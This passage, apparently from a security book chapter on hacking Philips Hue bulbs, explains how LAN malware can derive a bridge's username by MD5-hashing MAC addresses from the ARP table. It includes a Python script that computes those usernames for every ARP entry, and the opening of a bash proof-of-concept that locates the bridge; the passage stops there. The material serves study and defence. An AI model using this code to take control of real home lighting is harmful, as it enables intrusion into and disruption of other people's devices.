$ arp -a -n
? (172.20.0.1) at d4:ae:52:9d:1f:49 on en0 ifscope [ethernet]
? (172.20.0.23) at 7c:7a:91:33:be:a4 on en0 ifscope [ethernet]
? (172.20.0.52) at d8:a2:5e:4b:9a:50 on en0 ifscope [ethernet]
? (172.20.0.75) at 54:e4:3a:a6:4b:0e on en0 ifscope [ethernet]
? (172.20.0.90) at c8:f6:50:08:5f:e7 on en0 ifscope [ethernet]
? (172.20.0.154) at 74:e1:b6:9f:12:66 on en0 ifscope [ethernet]
Based on the output of the arp command, we can see the MAC address associated with each
device on the local network. For example, the device with the IP address 172.20.0.90 has the
MAC address c8:f6:50:08:5f:e7.
MD5 is a one-way hash function. The MD5 hash of c8:f6:50:08:5f:e7 can be computed with the
md5 tool:
$ md5 -s "c8:f6:50:08:5f:e7"
MD5 ("c8:f6:50:08:5f:e7") = 4ad1c59ad3f1c4fcdd67a55ee8f80160
In this case, the MD5 hash of c8:f6:50:08:5f:e7 is, and always will be,
4ad1c59ad3f1c4fcdd67a55ee8f80160. Given the one-way nature of MD5, it is hard to recover
the MAC address from the hash alone. However, imagine a situation in which a device on the
same network has been infected with a malicious program (also known as malware) installed
by an intruder. This malware can easily issue the arp command and quickly compute the MD5
hash of each MAC address in the table. Then, in order to cause a blackout, the malware simply
has to connect to the hue bridge on the local network and use the hash as the username to turn
off the lights. This creates a situation in which arbitrary malware on any device on the local
network can directly connect to the bridge and continuously issue commands to turn the lights
off, causing a perpetual blackout.
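To make the username derivation concrete, here is an added Python example (not code from the book) that parses the arp -a listing shown above, reused as constructed sample input with one extra unresolved entry, and computes the MD5-of-MAC value for every device. It assumes the bridge hashes the lowercase, colon-separated, zero-padded MAC exactly as the md5 -s invocation above does; entries reported as (incomplete) carry no MAC and are skipped. The point for a defender is that MD5's one-way property is irrelevant here: the input is an identifier every host on the LAN can read, so a whitelist built from it is only as secret as the ARP table.

```python
import hashlib
import re

# Constructed sample: the `arp -a -n` listing from the page plus one
# unresolved entry, which macOS prints as "(incomplete)".
ARP_OUTPUT = """\
? (172.20.0.1) at d4:ae:52:9d:1f:49 on en0 ifscope [ethernet]
? (172.20.0.23) at 7c:7a:91:33:be:a4 on en0 ifscope [ethernet]
? (172.20.0.52) at d8:a2:5e:4b:9a:50 on en0 ifscope [ethernet]
? (172.20.0.75) at 54:e4:3a:a6:4b:0e on en0 ifscope [ethernet]
? (172.20.0.90) at c8:f6:50:08:5f:e7 on en0 ifscope [ethernet]
? (172.20.0.154) at 74:e1:b6:9f:12:66 on en0 ifscope [ethernet]
? (172.20.0.254) at (incomplete) on en0 ifscope [ethernet]
"""

# One macOS/BSD arp line looks like "? (IP) at MAC on IFACE ...".
# Octets may be printed without a leading zero, hence {1,2}.
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at "
    r"(?P<mac>(?:[0-9a-f]{1,2}:){5}[0-9a-f]{1,2})",
    re.IGNORECASE,
)


def parse_arp_table(text):
    """Return {ip: mac} for every resolved entry; '(incomplete)' lines are dropped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def normalize_mac(mac):
    """Canonical form assumed to be what gets hashed: lowercase, zero-padded octets."""
    return ":".join(part.zfill(2) for part in mac.lower().split(":"))


def md5_of_mac(mac):
    """Equivalent of `md5 -s "<mac>"`: hash the text itself, no trailing newline."""
    return hashlib.md5(normalize_mac(mac).encode("ascii")).hexdigest()


def derived_usernames(arp_text):
    """Map each device on the LAN to the MD5-of-MAC username the page describes."""
    return {ip: md5_of_mac(mac) for ip, mac in parse_arp_table(arp_text).items()}


if __name__ == "__main__":
    for ip, username in derived_usernames(ARP_OUTPUT).items():
        print(f"{ip:15} -> {username}")
```

Run it as-is to see one username per resolved ARP entry; the (incomplete) host produces nothing, and a MAC printed as 8 instead of 08 still hashes to the same value as its zero-padded form.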
Let’s imagine a proof-of-concept malware program written in the bash shell available on most
Unix and Linux hosts. First, the malicious script needs to locate the IP address of the bridge:
# Loop until the bridge's LAN address has been discovered
while [ -z "$bridge_ip" ]; do
  # Ask the Hue N-UPnP service which bridge is on this network and
  # pull the first dotted-quad IPv4 address out of its JSON reply
  bridge_ip=($(curl --connect-timeout 5 -s https://www.meethue.com/api/nupnp |
    awk '{match($0,/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/);
          ip = substr($0,RSTART,RLENGTH); print ip}'))
  # If no bridge is found, try again in 10 minutes
  if [ -z "$bridge_ip" ]; then
    sleep 600
  fi
done
CHAPTER 1: LIGHTS OUT—HACKING WIRELESS LIGHTBULBS TO CAUSE SUSTAINED BLACKOUTS